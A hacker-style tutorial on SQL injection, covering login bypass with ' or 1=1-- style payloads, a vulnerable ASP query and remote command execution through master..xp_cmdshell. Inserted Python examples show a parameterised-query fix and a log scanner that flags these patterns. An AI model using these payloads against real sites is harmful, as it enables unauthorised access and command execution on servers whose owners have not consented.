J4ck th3 Cr4ck3r
1.0 Introduction
When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, we have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or the services running in the OS.
This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out "9.0 Where can I get more info?" for the people who truly deserve credit for developing many of the techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What should you look for?
Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc. Sometimes HTML pages use the POST command to send parameters to another ASP page; therefore you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag in the HTML code. Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit wise).
2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like: http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
into the login field, the password field, or even the URL.
Example: Login: hi' or 1=1--
Pass: hi' or 1=1--
http://duck/index.asp?id=hi or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it on your hard disk, and modify the URL and the hidden field accordingly.
If luck is on your side, you will get logged in without any valid login name or password.
3.1 But why ' or 1=1--?
Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name and 'food' is the value assigned to the variable. In order to do that, an ASP page might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our input will be wrapped into v_cat and thus the SQL statement becomes:
SELECT * FROM product WHERE PCategory='food'
The query should return a result set containing one or more rows that match the WHERE condition, in this case 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now our variable v_cat equals "food' or 1=1-- ", and if we substitute this in the SQL query we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. The double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#".
However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
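The following is an added example and not code from the original article: it reproduces the concatenated query of the ASP snippet in 3.1 and the login check described in 3.0 in Python against an in-memory SQLite database constructed here, beside the parameterised form that a defender would use instead. The table names, rows and the user record are assumptions made up for the demo; SQLite accepts the same "--" comment syntax as MS SQL Server, so the behaviour shown carries over.

```python
import sqlite3

# Constructed sample rows; the 'product' table mirrors the one in the article,
# the 'users' table stands in for the login page of section 3.0.
SAMPLE_PRODUCTS = [
    ("Apple", "food"),
    ("Bread", "food"),
    ("Hammer", "tools"),
    ("Screwdriver", "tools"),
]


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (PName TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", SAMPLE_PRODUCTS)
    # Plain-text password only to keep the demo short; real systems store a hash.
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def products_vulnerable(conn: sqlite3.Connection, v_cat: str) -> list:
    """Same construction as the article's ASP: the parameter is pasted into
    the SQL text, so quotes and '--' inside it become part of the query."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def products_safe(conn: sqlite3.Connection, v_cat: str) -> list:
    """Parameterised form: the driver passes the value separately from the
    statement text, so it can only ever be compared as data."""
    return conn.execute(
        "SELECT * FROM product WHERE PCategory=?", (v_cat,)
    ).fetchall()


def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """Login check built the same broken way (section 3.0)."""
    sqlstr = ("SELECT * FROM users WHERE username='" + user
              + "' AND password='" + pw + "'")
    return conn.execute(sqlstr).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """Parameterised login check: the injected text is just a user name
    that does not exist."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (user, pw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "food' or 1=1--"
    print("vulnerable:", products_vulnerable(db, payload))   # all four rows
    print("safe:      ", products_safe(db, payload))         # []
    print("login vulnerable:", login_vulnerable(db, "hi' or 1=1--", "x"))  # True
    print("login safe:      ", login_safe(db, "hi' or 1=1--", "x"))        # False
```

The point the comparison makes is that the fix is not to strip quotes or dashes from the input: the parameterised versions take exactly the same strings and simply never let them reach the SQL parser as syntax.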
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets on 10.10.1.2 and check whether any ping request arrives from the server:
#tcpdump icmp
If you do not get any ping request from the server, and you get an error message indicating a permission error, it is possible that the administrator has limited the web user's access to these stored procedures.
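As an added example that is not part of the original article, here is the defender's counterpart to sections 3 and 4: a small Python scanner that URL-decodes the request line of web-server access-log entries and flags the patterns this article describes (tautologies such as ' or 1=1, "--" comment truncation, stacked queries after a semicolon, and the xp_cmdshell stored procedure). The log lines, the indicator names and the log format are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in a common-log-like format (not real traffic).
# Line 2 carries the tautology from section 3.1, line 3 the xp_cmdshell stacked
# query from section 4.0, line 4 a legitimate value that merely contains a quote.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.asp?category=food HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.asp?category=food%27%20or%201%3D1-- HTTP/1.1" 200 8192
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.asp?id=10%27%3B%20exec%20master..xp_cmdshell%20%27ping%2010.10.1.2%27-- HTTP/1.1" 500 320
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search.asp?q=o%27neill HTTP/1.1" 200 1024
"""

# Indicators taken from the techniques in this article, applied to the
# URL-decoded query string. A lone quote is deliberately not an indicator:
# it fires on ordinary names (O'Neill) and tells you little on its own.
INDICATORS = {
    # "' or 1=1", "or 'a'='a", ") or ('a'='a" and their double-quote forms
    "tautology": re.compile(
        r"""\bor\s+\(?(?:\d+\s*=\s*\d+|(['"])(\w*)\1\s*=\s*\1\2)""", re.I),
    # "--" used to comment out the rest of the statement
    "comment_truncation": re.compile(r"--"),
    # ";" followed by a new statement (stacked query)
    "stacked_query": re.compile(
        r";\s*(?:exec|execute|select|insert|update|delete|drop)\b", re.I),
    # the stored procedure named in section 4.0
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
}


def parse_request(line: str):
    """Return (client_ip, path, decoded_query) for one log line, or None."""
    m = re.search(r'"(?:\w+) (\S+) HTTP/', line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # Decode before matching: attackers' tools send %27 and %20, not ' and space.
    return line.split(" ", 1)[0], path, unquote_plus(query)


def classify(line: str) -> list:
    """Names of every indicator that fires on the line's decoded query."""
    parsed = parse_request(line)
    if parsed is None:
        return []
    query = parsed[2]
    return [name for name, rx in INDICATORS.items() if rx.search(query)]


def scan(log_text: str) -> list:
    """Return (client_ip, path, decoded_query, hits) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            ip, path, query = parse_request(line)
            findings.append((ip, path, query, hits))
    return findings


if __name__ == "__main__":
    for ip, path, query, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}: {query!r}")
```

Signatures like these are a starting point for detection, not a substitute for the fixes the article itself points at: parameterised queries in the application, and a database login for the web application that cannot reach master..xp_cmdshell. A 500 response paired with a stacked_query hit, as on the third sample line, is the log-side view of the "permission error" the paragraph above describes.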
I will explain it better next time, and I will show you guys a site which is hacked by SQL injection, so stay tuned :)